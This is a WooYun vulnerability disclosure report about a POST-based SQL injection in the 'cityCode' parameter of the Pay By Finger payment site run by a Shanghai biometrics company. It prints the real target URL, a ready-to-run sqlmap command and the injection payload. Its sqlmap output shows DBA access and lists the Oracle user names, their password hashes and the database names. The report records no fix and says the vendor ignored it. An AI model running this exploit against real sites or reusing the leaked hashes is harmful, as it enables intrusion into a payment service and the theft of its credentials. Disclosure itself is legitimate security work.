漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:上海立佰趣信息科技有限公司指付通主站存在POST型SQL注射漏洞(DBA权限+13名系统管理员密码泄露)
提交时间:2015-11-20 18:17
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2015-11-20: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: “上海立佰趣信息科技有限公司”(公司品牌“立佰趣”,英文品牌“Live By Touch”)成立于2006年2月,是一家以生物识别技术为核心的应用运营公司。目前公司已与中金(CICC)、君联(Legend Capital)、鼎晖投资(CDH)等世界一流中资财团进行战略合作。 立佰趣(Live By Touch)认为指纹鉴定学代表了芯片和密码之后的发展方向,凭借拥有世界排名前三位的核心指纹应用技术,与国内外诸多商业银行、知名商户及各行业合作伙伴进行全方位的合作,致力于推行无需任何介质的生物认证体系,从而弥补目前社会通行的介质认证体系所存在的一些缺憾。作为一家以生物识别技术为核心的应用运营公司,不断研发新的应用产品。目前,公司已经推出具有世界最先进水平的第一个生物识别技术应用产品:指付通(Pay By Finger)。该项目已于2010年开始正式运营。
详细说明: 地址:http://www.paybyfinger.com.cn
python sqlmap.py -u "http://www.paybyfinger.com.cn" -p cityCode --technique=B --form --random-agent --batch --current-user --is-dba --users --passwords --dbs
漏洞证明:
--- Parameter: cityCode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX --- web application technology: Apache, JSP back-end DBMS: Oracle current user: 'FPS' current user is DBA: True database management system users [13]: [*] ALGORITHM [*] DBSNMP [*] FPS [*] OUTLN [*] PERFSTAT [*] PLATFORM [*] POINT [*] STRMADMIN [*] SYS [*] SYSTEM [*] WMSYS [*] ZABBIX [*] ZCT database management system users password hashes: [*] ALGORITHM [1]: password hash: 695B6259730A64FB [*] DBSNMP [1]: password hash: E066D214D5421CCC [*] FPS [1]: password hash: DC56B518968A5AE9 [*] OUTLN [1]: password hash: 4A3BA55E08595C81 [*] PERFSTAT [1]: password hash: 626A176E28C6CE55 [*] PLATFORM [1]: password hash: F8BC038657845D39 [*] POINT [1]: password hash: 7817F30648C47299 [*] STRMADMIN [1]: password hash: F7737B6F005CD1A1 [*] SYS [1]: password hash: BFE77DD10B99747E [*] SYSTEM [1]: password hash: 420A4FCE8EDB1662 [*] WMSYS [1]: password hash: 7C9BA362F8314299 [*] ZABBIX [1]: password hash: 701322E64241BE07 [*] ZCT [1]: password hash: 1E67C73BCC1D7FE7 sqlmap resumed the following injection point(s) from stored session: --- Parameter: cityCode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX --- web application technology: Apache, JSP back-end DBMS: Oracle sqlmap resumed the following injection point(s) from stored session: --- Parameter: cityCode (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: homeinputusername=%E6%90%9C%E7%B4%A2%E5%95%86%E6%88%B7%E5%90%8D,%E5%9C%B0%E5%9D%80,%E5%88%86%E7%B1%BB%E7%AD%89&codeKey=ljxD&selectkey=&curPage=1&cityCode=0021' AND 9624=9624 AND 'HHvX'='HHvX --- web application technology: Apache, JSP back-end DBMS: Oracle available databases [10]: [*] ALGORITHM [*] FPS [*] OUTLN [*] PERFSTAT [*] PLATFORM [*] POINT [*] STRMADMIN [*] SYS [*] SYSTEM [*] WMSYS
修复方案: 版权声明:转载请注明来源 路人甲 @乌云
漏洞回应